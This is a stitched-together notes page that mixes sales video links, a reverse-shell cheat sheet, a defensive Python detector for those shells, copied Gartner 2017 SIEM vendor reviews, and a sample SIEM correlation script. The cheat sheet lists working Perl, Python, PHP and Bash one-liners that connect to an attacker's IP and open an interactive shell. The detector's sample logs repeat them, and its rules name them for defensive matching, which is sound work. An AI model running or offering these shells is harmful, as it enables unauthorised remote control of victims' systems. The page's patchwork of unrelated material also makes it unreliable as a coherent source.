Everyone in sales needs to watch these videos:


A Conference Call – https://www.youtube.com/watch?v=kNz82r5nyUw

Meeting Backup – https://www.youtube.com/watch?v=wU99CCWr77k

The Expert – https://www.youtube.com/watch?v=BKorP55Aqvg

Email in Real Life – https://www.youtube.com/watch?v=HTgYHHKs0Zw

A Video Conference in Real Life – https://www.youtube.com/watch?v=JMOOG7rWTPg

Stuff Business People Say – https://www.youtube.com/watch?v=MHg_M_zKA6Y

Working from Home – https://www.youtube.com/watch?v=co_DNpTMKXk


Reverse shells


 

1.  perl -e 'use Socket;$i="<IP>";$p=<PORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
2.  perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"<IP>:<PORT>");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
3.  perl -MIO -e "$c=new IO::Socket::INET(PeerAddr,'<IP>:<PORT>');STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;"

 

python reverse shell (recommended)

1. python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP>",<PORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

If you want full terminal support (job control, tab completion, editors), you have to import the pty module and spawn a pseudo-terminal from inside the shell with the command below:

python -c 'import pty; pty.spawn("/bin/sh")'

php reverse shell

1. php -r '$s=fsockopen("<IP>",<PORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
2. php -r '$s=fsockopen("<IP>",<PORT>);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
3. php -r '$s=fsockopen("<IP>",<PORT>);`/bin/sh -i <&3 >&3 2>&3`;'
4. php -r '$s=fsockopen("<IP>",<PORT>);system("/bin/sh -i <&3 >&3 2>&3");'
5. php -r '$s=fsockopen("<IP>",<PORT>);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

bash reverse shell

1. bash -i >& /dev/tcp/<IP>/<PORT> 0>&1

2. exec 5<>/dev/tcp/<IP>/<PORT>;cat <&5 | while read line; do $line 2>&5 >&5; done

3. exec /bin/sh 0</dev/tcp/<IP>/<PORT> 1>&0 2>&0

4. 0<&196;exec 196<>/dev/tcp/<IP>/<PORT>; sh <&196 >&196 2>&196
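Every one-liner in this list, whichever language it is written in, has the same shape: open a TCP connection (or a /dev/tcp redirection), wire it into the stdin/stdout/stderr of an interactive shell, and optionally upgrade to a pty. That shape is what a defender looks for in process-execution telemetry. The script below is an added example, not part of the original cheat sheet: it matches those tells against constructed process-exec log lines. The log format (`<timestamp> uid=<n> cmd=<command line>`), the rule names and the sample lines are assumptions made for the example; real telemetry (auditd, EDR command-line events) will need the rules tuned for the tooling in your own environment.

```python
"""Defensive example: flag reverse-shell one-liners in process-execution logs.

Added example, not part of the original cheat sheet. It scans constructed
process-exec log lines for the tells the perl/python/php/bash one-liners
above have in common: a TCP connect (or /dev/tcp redirection) wired into
the stdin/stdout/stderr of an interactive shell. The log format
"<timestamp> uid=<n> cmd=<command line>" is an assumption for the example.
"""
import re
from dataclasses import dataclass, field

# Each rule is (name, regex). The patterns are taken from the one-liners on
# this page; they are heuristics and will need tuning on real telemetry.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\S+/\d+")),
    ("python_dup2_shell", re.compile(r"os\.dup2\(.*?\).*?/bin/(sh|bash)")),
    ("python_pty_spawn", re.compile(r"pty\.spawn\(")),
    ("php_fsockopen_shell", re.compile(r"fsockopen\(.*?\).*?/bin/sh")),
    ("perl_socket_exec", re.compile(r"(IO::Socket::INET|sockaddr_in).*?(exec|system)")),
    ("interactive_shell_fd", re.compile(r"/bin/sh -i .*?(<&\d|>&\d|2>&\d)")),
]

# Constructed log format: "<timestamp> uid=<n> cmd=<command line>".
LOG_RE = re.compile(r"^(?P<ts>\S+) uid=(?P<uid>\d+) cmd=(?P<cmd>.*)$")


@dataclass
class Finding:
    timestamp: str
    uid: str
    command: str
    rules: list = field(default_factory=list)


def parse_line(line):
    """Return (timestamp, uid, command) or None for a line that does not fit."""
    m = LOG_RE.match(line.strip())
    return (m["ts"], m["uid"], m["cmd"]) if m else None


def classify(command):
    """Names of every rule whose pattern occurs in the command line."""
    return [name for name, rx in RULES if rx.search(command)]


def scan(lines):
    """Parse each line, classify it, and collect the ones that hit a rule."""
    findings = []
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:  # malformed line: skip it, do not crash the scan
            continue
        ts, uid, cmd = parsed
        hits = classify(cmd)
        if hits:
            findings.append(Finding(ts, uid, cmd, hits))
    return findings


# Constructed sample telemetry (documentation-range IP): five command lines
# shaped like the one-liners above, two benign commands, one malformed line.
SAMPLE_LOG = [
    '2024-01-01T10:00:00Z uid=33 cmd=bash -i >& /dev/tcp/198.51.100.7/4444 0>&1',
    '2024-01-01T10:00:05Z uid=33 cmd=python -c import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("198.51.100.7",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])',
    '2024-01-01T10:00:09Z uid=33 cmd=python -c import pty; pty.spawn("/bin/sh")',
    '2024-01-01T10:01:00Z uid=1000 cmd=python -c import socket; print(socket.gethostname())',
    '2024-01-01T10:02:00Z uid=48 cmd=php -r $s=fsockopen("198.51.100.7",4444);exec("/bin/sh -i <&3 >&3 2>&3");',
    '2024-01-01T10:03:00Z uid=1000 cmd=bash -c cat /dev/null',
    '2024-01-01T10:04:00Z uid=33 cmd=perl -e use Socket;$i="198.51.100.7";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};',
    'not a telemetry line',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.timestamp} uid={f.uid} {','.join(f.rules)}: {f.command[:60]}")
```

The two benign commands (a hostname lookup and a `cat`) show why the rules key on the combination of socket plus shell rather than on `socket` or `bash` alone; the `interactive_shell_fd` rule is the cross-language catch-all for `/bin/sh -i` with its descriptors redirected, which is why the PHP line hits two rules.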

 

 

Magic Quadrant for Security Information and Event Management


Published: 04 December 2017 ID: G00315428

Analyst(s):

 

Summary

Security and risk management leaders are implementing and expanding SIEM to improve early targeted attack detection and response. Advanced users seek SIEM with advanced profiling, analytics and response features.

Market Definition/Description

This document was revised on 26 February 2018. The document you are viewing is the corrected version. For more information, see the Corrections page on gartner.com.

The security information and event management (SIEM) market is defined by the customer’s need to analyze event data in real time for the early detection of targeted attacks and data breaches, and to collect, store, analyze, investigate and report on event data for incident response, forensics and regulatory compliance. The vendors included in our Magic Quadrant analysis have products designed for this purpose, and they actively market and sell these technologies to the security buying center.

SIEM tools aggregate event data produced by security devices, network infrastructure, systems and applications. The primary data source is log data, but SIEM tools can also process other forms of data, such as NetFlow and network packets, or contextual information about users, assets, threats and vulnerabilities that can be found inside or outside the enterprise and that can be useful to enrich logs and raw data. All these data are normalized so that events, data and contextual information from disparate sources can be correlated and analyzed for specific purposes, such as threat management, network security event monitoring (SEM), user activity monitoring and compliance reporting. The tools provide real-time correlation of events for security monitoring, enable query and analytics for historical analysis, and offer other support for incident investigation and compliance reporting.
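To make the pipeline described in the preceding paragraph concrete, here is an added example that is not from the Gartner report and not any vendor's code. It normalizes events from two disparate sources (a constructed sshd syslog line and a constructed key=value export of Windows logon events 4624/4625) into one schema, enriches each event with a constructed host-criticality table, and runs one correlation rule over the merged stream: three or more logon failures from a single source IP followed by a success within five minutes, counted across both sources. The log formats, the asset table and the sample events are assumptions made for the example.

```python
"""Added example (not from the Gartner report): a minimal SIEM-style pipeline.

It does the three things the paragraph above describes: normalize events
from two disparate sources into one schema, enrich them with asset context,
and run a correlation rule over the result. Both log formats, the asset
table and the sample events are constructed for the example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Source 1: Linux sshd syslog lines (constructed, syslog-like format).
SSHD_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<outcome>Failed|Accepted) password for (?P<user>\S+) from (?P<ip>\S+)"
)
# Source 2: key=value export of Windows logon events (constructed format,
# using the real event IDs 4624 = logon success, 4625 = logon failure).
KV_RE = re.compile(r"(\w+)=(\S+)")

WINDOW = timedelta(minutes=5)  # correlation window
THRESHOLD = 3                  # failures before a success is suspicious


def _parse_ts(s):
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def normalize_sshd(line, host_ctx):
    """sshd line -> common event schema, enriched with host criticality."""
    m = SSHD_RE.match(line)
    if not m:
        return None
    return {"ts": _parse_ts(m["ts"]), "host": m["host"], "user": m["user"],
            "src_ip": m["ip"], "action": "logon",
            "outcome": "failure" if m["outcome"] == "Failed" else "success",
            "source": "sshd", "criticality": host_ctx.get(m["host"], "unknown")}


def normalize_windows(line, host_ctx):
    """Windows key=value logon event -> the same common schema."""
    kv = dict(KV_RE.findall(line))
    if kv.get("EventID") not in ("4624", "4625"):
        return None  # not a logon event (or not this format at all)
    return {"ts": _parse_ts(kv["TimeCreated"]), "host": kv["Computer"],
            "user": kv["TargetUserName"], "src_ip": kv["IpAddress"],
            "action": "logon",
            "outcome": "success" if kv["EventID"] == "4624" else "failure",
            "source": "windows",
            "criticality": host_ctx.get(kv["Computer"], "unknown")}


def correlate(events):
    """Alert when >= THRESHOLD logon failures from one source IP are followed
    by a success within WINDOW, whichever log sources saw the failures."""
    failures = defaultdict(deque)
    alerts = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        q = failures[ev["src_ip"]]
        while q and ev["ts"] - q[0]["ts"] > WINDOW:  # expire old failures
            q.popleft()
        if ev["outcome"] == "failure":
            q.append(ev)
        elif len(q) >= THRESHOLD:
            alerts.append({"rule": "brute_force_then_success",
                           "src_ip": ev["src_ip"], "user": ev["user"],
                           "host": ev["host"], "criticality": ev["criticality"],
                           "failures": len(q),
                           "sources": sorted({f["source"] for f in q} | {ev["source"]})})
            q.clear()
    return alerts


def run_pipeline(raw_lines, host_ctx):
    """Normalize every raw line it can, drop the rest, then correlate."""
    events = []
    for line in raw_lines:
        ev = normalize_sshd(line, host_ctx) or normalize_windows(line, host_ctx)
        if ev:
            events.append(ev)
    return events, correlate(events)


# Constructed asset context (host -> criticality): the kind of contextual
# information a SIEM uses to enrich raw events.
HOST_CONTEXT = {"web01": "medium", "web02": "medium", "dc01": "high"}

# Constructed sample events from both sources, deliberately out of order.
RAW_EVENTS = [
    "2024-03-01T10:00:00Z web01 sshd[2211]: Failed password for root from 203.0.113.5 port 51022 ssh2",
    "2024-03-01T10:00:20Z web01 sshd[2213]: Failed password for admin from 203.0.113.5 port 51030 ssh2",
    "TimeCreated=2024-03-01T10:00:41Z Computer=dc01 EventID=4625 TargetUserName=svc_backup IpAddress=203.0.113.5",
    "TimeCreated=2024-03-01T10:01:05Z Computer=dc01 EventID=4624 TargetUserName=svc_backup IpAddress=203.0.113.5",
    "2024-03-01T10:02:00Z web01 sshd[2300]: Accepted password for alice from 198.51.100.20 port 40010 ssh2",
    "2024-03-01T09:50:00Z web02 sshd[1901]: Failed password for root from 192.0.2.9 port 33001 ssh2",
    "2024-03-01T09:50:10Z web02 sshd[1902]: Failed password for root from 192.0.2.9 port 33002 ssh2",
    "2024-03-01T09:50:20Z web02 sshd[1903]: Failed password for root from 192.0.2.9 port 33003 ssh2",
    "2024-03-01T10:30:00Z web02 sshd[2500]: Accepted password for root from 192.0.2.9 port 33100 ssh2",
    "TimeCreated=2024-03-01T10:31:00Z Computer=dc01 EventID=4672 TargetUserName=svc_backup IpAddress=-",
]

if __name__ == "__main__":
    events, alerts = run_pipeline(RAW_EVENTS, HOST_CONTEXT)
    print(f"{len(events)} normalized events, {len(alerts)} alert(s)")
    for a in alerts:
        print(a)
```

The point of the sample data is the cross-source case: two sshd failures plus one Windows failure from 203.0.113.5 only add up to the threshold because both sources were normalized to the same `src_ip` and `outcome` fields, and the resulting alert carries the enrichment (`criticality: high` for dc01) that a raw log line would not. The 192.0.2.9 burst at 09:50 with a success forty minutes later shows the window expiring, and the 4672 event shows a non-logon record being dropped at normalization.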

Magic Quadrant

Figure 1. Magic Quadrant for Security Information and Event Management

Research image courtesy of Gartner, Inc.

Source: Gartner (December 2017)

Vendor Strengths and Cautions

AlienVault

AlienVault competes in the SIEM market with two offerings: AlienVault Unified Security Management (USM) Appliance (physical or virtual) for on-premises deployment and AlienVault USM Anywhere, a cloud-based SaaS solution. USM Appliance includes file integrity monitoring (FIM) via the host intrusion detection system (IDS), NetFlow analysis and full-packet capture. USM Anywhere is designed to monitor cloud and on-premises environments from the AlienVault Secure Cloud. AlienVault also offers Open Threat Exchange (OTX), a free, community-supported threat intelligence sharing forum that integrates threat intelligence into USM. AlienVault Labs Threat Intelligence is a subscription service that updates correlation rules, reports, response templates, signatures for IDS and vulnerability checks in both USM Appliance and USM Anywhere. AlienVault is no longer offering its USM for Amazon Web Services (AWS) product, and customers of USM AWS have been migrated to USM Anywhere.

USM Anywhere became generally available in February 2017, and is the result of a from-scratch development effort. The focus of USM Anywhere is monitoring cloud environments, initially AWS and Microsoft Azure, although monitoring of on-premises technology is supported as well. The USM Anywhere architecture accommodates apps (AlienApps) to enable adding capabilities in a modular fashion. USM Anywhere and USM Appliance features and capabilities differ somewhat. AlienVault’s current plans are to continue to offer both USM Appliance and USM Anywhere. The pricing model for USM Appliance is based on the number of appliances required, available as a perpetual license or monthly subscription. USM Anywhere is sold as a monthly subscription, priced by the volume of data consumed.

STRENGTHS
  • USM Appliance and USM Anywhere provide several integrated security capabilities, including asset discovery, FIM, vulnerability assessment, and both host-based and network-based intrusion detection systems.
  • AlienVault provides content updates via its Threat Intelligence subscriptions, as well as community source intelligence, that are integrated into the monitoring, detection and reporting functions of USM Appliance and USM Anywhere.
  • Customers report that the security monitoring technologies included with USM offer a lower cost for more capabilities compared with products from most competitors in the SIEM space.
  • The pricing model for USM Anywhere and USM Appliance is straightforward and easy to understand, and the availability of monthly subscription pricing for USM Appliance offers flexibility.
CAUTIONS
  • There are differences in the capabilities of USM Appliance and USM Anywhere that may present potential buyers with trade-offs. For example, capturing NetFlow data is supported by USM Appliance, but not by USM Anywhere. USM Anywhere, however, can capture VPC flow logs from AWS. USM Appliance uses correlations to provide basic enrichment of event data with user context, and USM Anywhere uses a graph-based engine to support a basic user and entity behavior analytics (UEBA) capability focused on cloud environments.
  • USM Appliance has more limited support for cloud environments than USM Anywhere. For example, in AWS, USM Anywhere monitors CloudTrail, CloudWatch Classic Load Balancer, Application Load Balancer and Simple Storage Service (S3) access, plus logs for installed software, and provides vulnerability assessments. USM Appliance provides monitoring of Windows and Linux guests on AWS via an HIDS agent.
  • AlienVault’s target market is midsize enterprises and smaller organizations. As a result, enterprise-oriented features, such as role-based workflow, ticketing integrations, support for multiple threat intelligence feeds and advanced analytics capabilities, lag behind those of competitors that focus on enterprise customers.

BlackStratus

BlackStratus is a SIEM technology and service-focused vendor with solutions aimed at large enterprises, small or midsize businesses (SMBs), managed security service providers (MSSPs), and managed service providers (MSPs). The portfolio is composed of LOGStorm, SIEMStorm and CYBERShark. LOGStorm is a log and event management and reporting tool targeted at SMBs and MSSPs. It is available as a physical and virtual appliance. LOGStorm leverages a Vertica big data platform and stores both raw and normalized event data. SIEMStorm is a natively multitenant platform that is delivered as software, where components can be installed on a single physical or virtual server, or installed separately depending on the size and scope of the environment to be monitored. SIEMStorm includes core SIEM capabilities including real-time event management, correlation, analytics, workflow and incident response, and reporting. It is targeted at large enterprises or organizations with federated security monitoring requirements (e.g., across lines of business or child companies), as well as at MSSPs needing to support customers in a shared, multitenant environment. CYBERShark is a SIEM as a service aimed at MSPs and SMBs. It is delivered as a cloud-based solution, along with 24/7 Tier 1 security operations center (SOC) security monitoring and alerting services.

Recent enhancements of the platforms include a variety of new product integrations, in particular support for AWS, Azure, Office 365 and ServiceNow, as well as improvements to the user interface and back-end performance optimizations. Support for GE Digital (Wurldtech) OpShield was added to extend SIEMStorm to operational technology security monitoring use cases.

STRENGTHS
  • The architectures for SIEMStorm and LOGStorm are flexible for both deployment and expansion. All application components are multitenant out of the box.
  • Integrations added over the past 12 months extend support for popular service desk solutions, as well as SaaS and IaaS environments.
  • Support for OT data sources is now a native feature, albeit with limited support for OT security-based threat detection vendors, such as GE Digital (Wurldtech).
  • SIEMStorm includes a fully integrated incident and ticket management system based on the SANS Institute’s incident handling process.
CAUTIONS
  • Native advanced threat detection solutions, such as FIM, endpoint detection and response (EDR), network deep packet inspection, and network forensics, are not available. The vendor’s open API does allow for integration with a variety of third-party solutions.
  • Advanced analytics capabilities are very limited. BlackStratus indicates that expansion of analytics is planned over the next year.
  • Support for identity and access management (IAM) solutions is limited. User-based event monitoring is provided for Active Directory (AD) and a variety of web access management (WAM) solutions.
  • SIEMStorm’s workflow capabilities lack orchestration and automation features.
  • BlackStratus has a large MSSP and MSP customer base, but lacks visibility with Gartner’s enterprise and SMB end-user clients.

Dell Technologies (RSA)

RSA (a Dell Technologies business since the acquisition of EMC by Dell in September 2016) competes in the SIEM market via its RSA NetWitness Suite. The suite is composed of RSA NetWitness Logs and Packets, RSA NetWitness Endpoint, and RSA NetWitness Security Operations (SecOps) Manager. RSA NetWitness Suite is focused on real-time threat detection, incident response, forensics and threat hunting use cases leveraging network full-packet capture, security event and log data, NetFlow, and telemetry from endpoints. The architecture is composed of the RSA NetWitness Server along with Decoders (full-packet capture, logs, NetFlow and endpoint data collection); Concentrators (metadata aggregation and indexing); Event Stream Analytics (analytics for real-time monitoring and alerting); and Archivers (data and event archiving tier). There is a stand-alone management server for RSA NetWitness Endpoint. RSA NetWitness Suite offers flexible deployment options as it can be installed as software, physical and virtual appliances, and in hybrid configurations. On-premises as well as IaaS environments are supported. Scalability (both vertically and horizontally) is supported through the deployment of additional components (e.g., Decoders, Concentrators and Archivers). RSA NetWitness SecOps Manager, a module in the RSA Archer solution, adds advanced incident management workflow, operational playbooks, management dashboards and reporting. The solution is primarily licensed by volume (software model) or per appliance for Logs and Packets, and by number of agents for Endpoint. Both perpetual and term models are available.

Since mid-2016, RSA has added additional support for event and data collection within IaaS (AWS and Azure), support for deploying RSA NetWitness Suite components in AWS, and additional feature and functionality enhancements, such as the addition of RSA Live-delivered content packs focused on new users as well as advanced threat hunters, Trial Rules (allows rules to be demoed before being implemented in production), Endpoint agent support added for Linux and Mac, and expanded command-and-control behavior-based analytics. RSA NetWitness Suite 11, released in October 2017, provides a new user interface and enhancements to capabilities for investigation, incident management and identity insights.

STRENGTHS
  • RSA NetWitness Suite offers a single-solution approach for threat detection and event monitoring, investigation, and response across network traffic, endpoints and other security event and log data sources.
  • RSA NetWitness Suite’s focus on advanced threat detection, incident response, forensics and threat hunting makes it a viable solution for buyers with, or planning to deploy, a SOC and those looking for a single, integrated platform across teams.
  • RSA Live, a cloud-based service, provides a marketplace-type interface for RSA NetWitness content packs (threat detection rules, parsers, reports), threat intelligence and third-party integrations. Threat intelligence and content updates can be automated so they are seamless to users.
  • The RSA NetWitness Suite provides a flexible architecture that scales from a single appliance to complex n-tier deployments, which can span both on-premises and IaaS.
  • Out-of-the-box threat intelligence includes access to over two dozen threat feeds, including intelligence from RSA’s FirstWatch research team and incident response activities, and RSA Live provides crowdsourced threat intelligence from RSA NetWitness customers.
CAUTIONS
  • RSA NetWitness Suite’s user interface is basic compared to competing SIEM solutions. RSA indicates that a new UI is included with version 11, released in October 2017.
  • RSA NetWitness Logs and Packets lags behind similar SIEM solutions in UEBA capabilities. Integrations are available with third-party UEBA vendors.
  • RSA NetWitness Suite’s incident management capabilities are lightweight. Buyers looking for richer workflow capabilities need to purchase RSA NetWitness SecOps Manager.
  • Native security orchestration and automation capabilities are limited, but out-of-the-box integrations with most third-party security operations, analytics and reporting (SOAR) solutions are available.

EventTracker

In October 2016, EventTracker merged with Netsurion, a provider of managed security services, and EventTracker continues as a subsidiary with its own brand. EventTracker targets its SIEM software and service offerings primarily at midsize and government organizations with security event management and compliance reporting requirements. EventTracker Enterprise software is available, with licensing based on the number of event sources. Standard components include correlation, alerting, behavior analysis, reporting, dashboards and a large number of event source knowledge packs. Options include configuration assessment, change audit FIM, ntopng, flow analyzer, honeynet, threat intelligence feeds and the analyst data mart. Service offerings include SIEMphonic co-managed SIEM aligned to run, watch, tune and comply with activities performed on schedules ranging from daily to weekly. Collection from and deployment in AWS and Azure are natively supported.

In the past year, EventTracker has added a security scorecard dashboard that provides a risk-prioritized view of security incidents and a deception component (honeynet) offered as a managed service. Support for NIST SP 800-171 and the EU’s General Data Protection Regulation (GDPR), as well as 23 NYCRR 500 compliance, was also introduced.

Midsize businesses requiring a software-based solution for log and event management, compliance reporting, and operations monitoring via on-premises or cloud-hosted SIEM with optional, flexible monitoring services should consider EventTracker.

STRENGTHS
  • EventTracker is easy to deploy and maintain, and offers compliance and use-case-specific content with prebuilt alerts, correlation rules and reports.
  • EventTracker’s software pricing model is based on the number of event sources and is thus relatively straightforward for potential customers to understand. Perpetual license and annual subscription pricing are offered.
  • EventTracker’s SIEMphonic managed SIEM services aligned with run, watch, tune and comply activity are a differentiator, and address the needs of its target market.
CAUTIONS
  • EventTracker’s SIEMphonic managed SIEM services offerings are priced on data volume (not on event source count, which is the model for the software), so potential buyers comparing the two options will need to make different calculations when developing assumptions about the scope and growth of the monitored environment.
  • EventTracker’s advanced threat detection features are basic, Windows-centric and, in the case of flow and packet capture, not cleanly integrated into the core product. Integrations with third-party advanced threat detection/response technologies are not available.
  • EventTracker’s capabilities for application monitoring are more limited than SIEM products that target enterprise deployments, as they lack integration with major packaged applications.
  • Full incident management, including ticketing, requires an external solution. Several integrations via email and XML are supported.

Exabeam

Exabeam Security Intelligence Platform is a collection of components that collectively deliver the Exabeam SIEM solution that was introduced in February 2017. The platform is built on a variety of big data technologies, including Elastic, Hadoop, Kafka and Spark. Data management (collection, parsing, indexing and storage) is provided by Log Manager, which also includes agent-based collectors that can collect logs from local resources or from cloud-based applications using RESTful APIs. Advanced Analytics, also sold as Exabeam’s stand-alone UEBA tool, provides analytics functionality via a collection of both expert rules as well as behavior- and machine learning (ML)-based analytics. Incident Responder provides workflow, case management, security orchestration and automation capabilities. Threat Hunter is a search and investigation tool oriented toward analysts doing incident investigations and analyses, or threat-hunting-oriented activities. Threat Hunter provides user-based timelines rather than focusing on standard query and search approaches. Customers requiring connecting to IaaS and SaaS can purchase Exabeam’s Cloud Connectors, which are prebuilt API connectors for a variety of services, such as several AWS services, Office 365, SharePoint, Box and Salesforce. Exabeam’s components can be run on dedicated appliances (two versions are currently available), and installed as software or virtual appliances.

STRENGTHS
  • Exabeam’s licensing approach is based on the number of users in an organization, rather than the velocity or volume of event, log and contextual data analyzed.
  • Exabeam has established itself as complementary to existing SIEM solutions through its UEBA solution, which forms the core of the vendor’s solution portfolio. Advanced Analytics is included as part of the core platform, rather than as an add-on to complement traditional signature- and correlation-based rules.
  • Customers can customize the SIEM platform by selecting the components to meet their requirements (e.g., starting out with Log Manager and Advanced Analytics and adding Incident Responder and Threat Hunter as buyer experience and maturity in security monitoring improve).
  • Exabeam’s architecture is big data-oriented and supports a variety of deployment options (physical and virtual, and on-premises, IaaS or hybrid) and offers easy horizontal scalability through the addition of more appliances.
CAUTIONS
  • Most of Exabeam’s full platform, except for Advanced Analytics (which has been available for several years as a stand-alone UEBA tool, complementing SIEM), does not yet have widespread adoption and use compared to most SIEM solutions on the market.
  • Predefined reporting capabilities against industry and regulatory requirements are nascent, given the focus on user-based monitoring. Reports can be created from searches and saved as dashboards, or created from visualization capabilities for viewing and exporting.
  • Exabeam’s platform lacks native network traffic analysis capabilities, although it supports a variety of third-party solutions. Flow data cannot yet be analyzed, but is available for ingestion and searches as part of incident investigations.

FireEye

FireEye is a new entrant in the SIEM Magic Quadrant. FireEye’s SIEM offering is Threat Analytics Platform (TAP), which is delivered as a service leveraging AWS. TAP provides real-time security analytics, investigative threat hunting, monitoring and data management, and storage, with data segregated on a per-customer basis. Integrated threat intelligence is provided by in-house iSIGHT security researchers and Mandiant incident responders. Both multitenant as well as single-instance versions are supported.

TAP customers deploy a Cloud Collector appliance on their network to aggregate and securely transmit logs to TAP. Cloud Collector can also be deployed as a network security monitoring appliance that generates its own network metadata events as well as providing selective full-packet capture. Cloud Collector can be deployed as software, as an ISO installer that supports bare-metal hardware or virtualized environments, or as a physical appliance. Licensing is based on events per second (EPS) and data storage/retention requirements (13 months is the default).

STRENGTHS
  • TAP’s as-a-service delivery model gets strong marks for ease of deployment. There is no technology for customers to manage and only Cloud Collector appliances to deploy. There is out-of-the-box support for a large variety of event sources. There are more than 2,300 predefined rules for alerting, which are updated or added continually.
  • Threat intelligence from FireEye iSIGHT, as well as curated open-source feeds, is included with the service.
  • Guided investigation support for incidents and events includes best-practice suggestions and predefined searches.
  • FireEye provides an optional 24/7 monitoring service (FireEye as a Service) for customers that lack the resources to staff full-time operations.
CAUTIONS
  • TAP currently includes a limited number of report templates, with PCI and HIPAA templates available for compliance reporting.
  • Integrations with enterprise configuration management databases (CMDBs) and AD, support for STIX and TAXII, and more advanced orchestration and automation features are available only with the additional purchase of FireEye Security Orchestrator.
  • Potential customers should closely evaluate TAP’s current capabilities for advanced analytics against the use cases they want to support. User behavior analytics and analytics covering long time frames are not available.

Fortinet

FortiSIEM, acquired from AccelOps in 2016, is a component of Fortinet’s Security Fabric framework that provides traditional SIM and SEM capabilities, complemented by a built-in CMDB, application and system performance monitoring capabilities, and agent-based FIM. Fortinet positions FortiSIEM for MSPs, telecommunications providers and MSSPs that use or support other Fortinet solutions, in addition to security operations buyers in large enterprises, government and education. FortiSIEM has been adopted by organizations where security and network operations monitoring are delivered from a unified solution, as well as by MSPs and MSSPs that take advantage of the full FortiSIEM stack.

FortiSIEM’s architecture is composed of four components (Supervisor, Worker, Collector and Report Server) that are deployed via virtual appliances supported across a variety of on-premises (ESX, KVM, Hyper-V, Xen and OpenStack) and IaaS platforms (AWS and Azure), and can be deployed as a single appliance or as stand-alone components for scalability. Data management leverages a mix of big data (NoSQL) and RDBMS. Managed SIEM as a service is also available to end users as well as to MSPs and MSSPs. Physical appliance options and a remediation library for integrations with third-party tools are expected later in 2017. Licensing is primarily based on the number of data sources, EPS and agents deployed.

Over the past 12 months, Fortinet has added additional integrations within the Fortinet Security Fabric, as well as adding risk-based scoring for devices; STIX and TAXII support for improved threat intelligence capabilities; user activity auditing for SaaS such as Office 365 and G Suite; and the initial move to an HTML5-based UI.

STRENGTHS
  • FortiSIEM provides a single platform for organizations looking to support multiple environments (on-premises physical and virtual, SaaS, and IaaS), use cases and teams across IT (network operations, security operations and application performance monitoring [APM]).
  • A built-in autodiscovery feature and an integrated CMDB capability support use cases across IT, network operations and security operations.
  • FortiSIEM’s scope of reporting covers a wide variety of compliance requirements and best practices for both security operations and network operations across several geographies.
  • Midmarket organizations, especially those leveraging other Fortinet products, where security responsibilities are federated out to teams like network operations, will benefit from the unified platform available with FortiSIEM, which includes native workflow and the ability to perform basic automated response activities.
CAUTIONS
  • FortiSIEM lags behind the competition in advanced analytics capabilities and easy integration (e.g., through an app store interface) with third-party technologies, such as EDR, UEBA, and security orchestration and automation tools.
  • Out-of-the-box threat intelligence is not provided, but support for Fortinet’s FortiGuard threat intelligence platform, as well as integrations with third-party threat feeds, is provided.
  • FortiSIEM has limited visibility with Gartner clients procuring SIEM solutions.

IBM

IBM QRadar Security Intelligence Platform is composed of QRadar SIEM at the core, with additional components providing complementary security monitoring and operations capabilities, such as log management (Log Manager), network monitoring (QFlow, Network Insights and Incident Forensics), vulnerability management (Vulnerability Manager) and risk management (Risk Manager). IBM positions QRadar as an on-premises solution available via a stand-alone or distributed architecture, SIEM as a service (QRadar on Cloud) or as co-managed QRadar in partnership with IBM Managed Security Services. QRadar’s on-premises architecture is deployed via physical or virtual appliances (for on-premises or IaaS), software, and hosted cloud. The core components include Event Collectors and Event Processors, QFlow Collectors and Processors, Data Nodes, and Consoles, in addition to the premium components. Advanced threat detection and response capabilities include UEBA functionality (the QRadar UBA App) supported by ML-based analytics (QRadar Machine Learning Analytics app), threat intelligence provided by IBM’s X-Force Threat Intelligence feed, QRadar Advisor with Watson app and Resilient Incident Response Platform for incident response and orchestration and automation capabilities. IBM QRadar is licensed primarily by EPS and flows per second (FPS), and premium modules and apps are charged separately.

Over the past 12 months, IBM has introduced a variety of new capabilities, including user behavior analytics (UBA), Machine Learning Analytics app, Advisor with Watson app, Network Insights and platform enhancements around user interfaces and usability features, and data storage compression and optimization. Integrations with partners have been expanded through additions to QRadar App Exchange. IBM Resilient (an incident response tool) is now being offered as a premium service alongside QRadar engagements.

STRENGTHS
  • QRadar supports both midsize and large enterprises that require core SIEM capabilities, in addition to those looking for a unified platform that covers a wide range of security monitoring and operational technologies.
  • QRadar provides a flexible architecture that can support a variety of environments, including hybrid monitoring options across on-premises and IaaS.
  • QRadar App Exchange provides an improved user experience for integrating premium content, content packs and third-party security controls into the QRadar Console and Security Intelligence Platform compared to many competitors.
  • Buyers looking to implement advanced analytics and user-based monitoring will benefit from the free UBA and ML apps provided with the core SIEM product.
  • QRadar offers a single view across real-time and historic network-based event sources through the correlation of log data, NetFlow, QFlow, deep packet inspection (via Network Insights) and full-packet capture.
  • There is widespread availability of managed service support for on-premises QRadar deployments from third parties (and from IBM for large accounts), and QRadar is also available in a hosted SIEM model.
